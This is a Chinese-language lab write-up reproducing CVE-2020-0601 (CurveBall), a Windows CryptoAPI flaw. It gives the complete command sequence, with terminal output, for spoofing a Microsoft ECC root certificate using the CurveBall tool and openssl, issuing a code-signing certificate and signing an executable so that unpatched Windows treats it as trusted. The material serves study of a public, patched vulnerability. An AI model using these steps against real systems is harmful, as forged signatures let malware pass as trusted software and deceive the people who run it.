win證書漏洞CVE-2020-0601

影響版本：

Windows 10

Windows Server 2016/2019

依賴于Windows CryptoAPI的應用程式

檢視win證書

檢視一下本地windows證書，win+r輸入certmgr.msc

這裡可以看到系統預設的ECC簽名根證書，随便找一個導出：

輕按兩下證書可以看到證書的詳細資訊：

複現：

//安裝 rudy
a@a-virtual-machine:~$ sudo apt install ruby
//若提示程序被占用解決方法
//ps -A | grep apt				列出使用的程序
//sudo kill -9 程序号				殺死程序
//生成spoofed_ca.key公鑰檔案
a@a-virtual-machine:~/CurveBall-master$ ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cer
//生成spoofed_ca.crt公鑰檔案
a@a-virtual-machine:~/CurveBall-master$ openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt
Can't load /home/a/.rnd into RNG
140535782355392:error:2406F079:random number generator:RAND_load_file:Cannot open file:../crypto/rand/randfile.c:88:Filename=/home/a/.rnd
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:aa
State or Province Name (full name) [Some-State]:aa
Locality Name (eg, city) []:aa
Organization Name (eg, company) [Internet Widgits Pty Ltd]:aa
Organizational Unit Name (eg, section) []:aa
Common Name (e.g. server FQDN or YOUR name) []:aa                               
Email Address []:aa															 '		
//生成cert.key密鑰檔案													
a@a-virtual-machine:~/CurveBall-master$ openssl ecparam -name secp384r1 -genkey -noout -out cert.key
//生成cert.csr檔案
a@a-virtual-machine:~/CurveBall-master$ openssl req -new -key cert.key -out cert.csr -config openssl_cs.conf -reqexts v3_cs
//生成cert.crt簽名證書
a@a-virtual-machine:~/CurveBall-master$ openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_cs.conf -extensions v3_cs
Signature ok
subject=C = DK, ST = Denmark, L = Copenhagen, O = ollypwn, CN = ollypwn
Getting CA Private Key
//生成cert.p12證書檔案
a@a-virtual-machine:~/CurveBall-master$ openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed_ca.crt -name "Code Signing" -out cert.p12
Enter Export Password:
Verifying - Enter Export Password:
生成python_signed.exe簽名可執行檔案
a@a-virtual-machine:~/CurveBall-master$ osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in python.exe -out python_signed.exe

Command 'osslsigncode' not found, but can be installed with:

sudo apt install osslsigncode

a@a-virtual-machine:~/CurveBall-master$ sudo apt install osslsigncode
[sudo] a 的密碼： 
正在讀取軟體包清單... 完成
a@a-virtual-machine:~/CurveBall-master$ osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in 7z1900-x64.exe -out python_signed.exe
Succeeded
           

參考文獻：

https://github.com/ollypwn/CurveBall

https://blog.csdn.net/Eastmount/article/details/104335673